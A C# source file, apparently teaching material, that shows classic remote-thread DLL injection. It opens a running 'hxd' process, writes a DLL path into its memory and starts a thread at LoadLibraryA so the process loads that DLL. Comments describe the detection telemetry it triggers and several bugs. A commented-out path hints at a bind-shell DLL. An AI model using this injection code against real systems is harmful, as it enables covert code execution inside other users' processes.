using System;
using System.Diagnostics;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;

namespace ch1_hello_world
{
    /// <summary>
    /// Textbook remote-thread DLL loading: open a process with VM/thread rights, copy a
    /// DLL path into it, then start a thread in it at kernel32!LoadLibraryA so the target
    /// loads the DLL itself. Each step is a well-known telemetry point for defenders:
    /// the cross-process OpenProcess with VM_WRITE|CREATE_THREAD (Sysmon Event ID 10),
    /// the cross-process WriteProcessMemory, and CreateRemoteThread into another process
    /// (Sysmon Event ID 8) are exactly what EDR and host-monitoring rules key on.
    /// No return value in this class is checked; every failure surfaces as a later
    /// call receiving a zero handle or pointer.
    /// </summary>
    public class BasicInject
    {
        /// <summary>
        /// Subset of the Win32 MEM_* allocation/free flags. Only <see cref="Release"/>
        /// (MEM_RELEASE) is used in this file, as the free type for VirtualFreeEx.
        /// </summary>
        [Flags]
        public enum AllocationType
        {
            Commit = 0x1000,
            Reserve = 0x2000,
            Decommit = 0x4000,
            Release = 0x8000,
            Reset = 0x80000,
            Physical = 0x400000,
            TopDown = 0x100000,
            WriteWatch = 0x200000,
            LargePages = 0x20000000
        }

        // Returns IntPtr.Zero on failure (e.g. insufficient rights on a protected
        // process); SetLastError is not requested, so the reason is not retrievable.
        [DllImport("kernel32.dll")]
        public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

        // Resolves a module base in the *calling* process, not the target.
        [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
        public static extern IntPtr GetModuleHandle(string lpModuleName);

        // GetProcAddress only exists as an ANSI export, hence CharSet.Ansi + ExactSpelling.
        [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
        static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

        // NOTE(review): native dwSize is SIZE_T (pointer-sized); uint is narrower on
        // 64-bit. Works here because only a small size is passed — confirm if reused.
        [DllImport("kernel32.dll", ExactSpelling = true, SetLastError = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        // NOTE(review): nSize is also SIZE_T natively; same narrowing caveat as above.
        // The marshaler pins lpBuffer for the call, so nSize must not exceed lpBuffer.Length.
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);

        // Returns a thread handle, or IntPtr.Zero on failure. lpThreadId is declared as a
        // raw pointer so IntPtr.Zero can be passed to discard the thread id.
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        // NOTE(review): dwSize is SIZE_T natively; int is narrower on 64-bit. With
        // MEM_RELEASE the size must be 0, which is what Main passes.
        [DllImport("kernel32.dll", SetLastError=true, ExactSpelling=true)]
        static extern bool VirtualFreeEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, AllocationType dwFreeType);

        // SuppressUnmanagedCodeSecurity removes the unmanaged-code permission demand on
        // this P/Invoke (a .NET Framework CAS mechanism); the ReliabilityContract marks it
        // safe to call from constrained-execution regions. Neither changes behaviour on
        // .NET Core / .NET 5+.
        [DllImport("kernel32.dll", SetLastError=true)]
        [ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
        [SuppressUnmanagedCodeSecurity]
        [return: MarshalAs(UnmanagedType.Bool)]
        static extern bool CloseHandle(IntPtr hObject);

        // Process access-right bits requested from OpenProcess (Win32 PROCESS_* values).
        const int PROCESS_CREATE_THREAD = 0x0002;
        const int PROCESS_QUERY_INFORMATION = 0x0400;
        const int PROCESS_VM_OPERATION = 0x0008;
        const int PROCESS_VM_WRITE = 0x0020;
        const int PROCESS_VM_READ = 0x0010;

        // Win32 MEM_* / PAGE_* values for VirtualAllocEx. The buffer is committed as
        // read/write only (not executable): it holds data, the path string, not code.
        const uint MEM_COMMIT = 0x00001000;
        const uint MEM_RESERVE = 0x00002000;
        const uint PAGE_READWRITE = 0x4;

        /// <summary>
        /// Entry point. Targets the first process named "hxd" and makes it load the DLL at
        /// the hard-coded path in <c>dllName</c>. Progress is printed to the console; no
        /// Win32 return value is checked and no exception is caught.
        /// </summary>
        /// <param name="args">Unused.</param>
        public static void Main(string[] args)
        {
            // [0] throws IndexOutOfRangeException when no "hxd" process is running:
            // GetProcessesByName returns an empty array rather than null.
            Process targetProcess = Process.GetProcessesByName("hxd")[0];
            Console.WriteLine("hxd.exe PID: " + targetProcess.Id);

            // attach to process
            // Access mask = create thread + query + VM operation/write/read. Opening another
            // process with this combination is itself a recorded event on monitored hosts.
            // A zero result (open failed) is not checked here and is passed on to the
            // calls below.
            IntPtr hProcess = OpenProcess(
                PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                false,
                targetProcess.Id);
            Console.WriteLine("Process Handle: " + hProcess);

            // allocate memory in the process
            // string dllName = "c:\\bind.dll";
            // string dllName = "c:\\hello-world-x86.dll";
            string dllName = "c:\\umuc.dll";
            // Size is (length + 1) * Marshal.SizeOf(char). Marshal.SizeOf reports the
            // *unmanaged* size of char (1, ANSI), not sizeof(char) == 2, so this is the
            // byte length of the ANSI path plus one terminator byte.
            // NOTE(review): the terminator itself is never written below; the code relies on
            // the freshly committed page being zero-filled — confirm before reusing.
            IntPtr szRemoteFileName = VirtualAllocEx(hProcess, IntPtr.Zero,
                // (uint) ((dllName.Length) * Marshal.SizeOf(typeof(char))), MEM_COMMIT, PAGE_READWRITE);
                (uint) ((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT, PAGE_READWRITE);
            Console.WriteLine("VirtualAllocEx: " + szRemoteFileName);

            // write path to dll in process
            // NOTE(review): GetBytes yields exactly dllName.Length bytes with no terminator,
            // but nSize is (Length + 1) * SizeOf(char) — one byte more than the pinned
            // buffer. The bool result (and whether bytesWritten matched) is not checked.
            // NOTE(review): LoadLibraryA expects an ANSI string; Encoding.Default is the
            // system ANSI code page on .NET Framework but UTF-8 on .NET Core / .NET 5+.
            // Identical for this ASCII-only path, but worth confirming for other inputs.
            UIntPtr bytesWritten;
            WriteProcessMemory(hProcess, szRemoteFileName, Encoding.Default.GetBytes(dllName),
                // (uint) ((dllName.Length) * Marshal.SizeOf(typeof(char))), out bytesWritten);
                (uint) ((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
            Console.WriteLine("Bytes Written: " + bytesWritten);

            // get address of LoadLibraryA
            // Resolved in *this* process; it is only meaningful as a remote start address if
            // kernel32.dll is mapped at the same base in the target (same bitness), which is
            // assumed, not verified. If the local lookup fails this is IntPtr.Zero.
            IntPtr pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA");
            // NOTE(review): the label is misleading — this prints the LoadLibraryA export
            // address, not the kernel32 module base.
            Console.WriteLine("Kernel32 Address: " + pfnThreadRtn);

            // execute DLL
            // Remote thread with LoadLibraryA as its start routine and the path buffer as its
            // single argument. Creating a thread in another process is the canonical
            // CreateRemoteThread detection event (Sysmon Event ID 8). The handle is not
            // checked for IntPtr.Zero.
            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, pfnThreadRtn, szRemoteFileName, 0, IntPtr.Zero);

            // NOTE(review): the path buffer is released immediately, without waiting on
            // hThread, so the remote thread may read freed memory if it has not yet run.
            // Size must be 0 with MEM_RELEASE, which is what is passed.
            VirtualFreeEx(hProcess, szRemoteFileName, 0, AllocationType.Release);
            CloseHandle(hThread);
            CloseHandle(hProcess);
            return;
        }
    }
}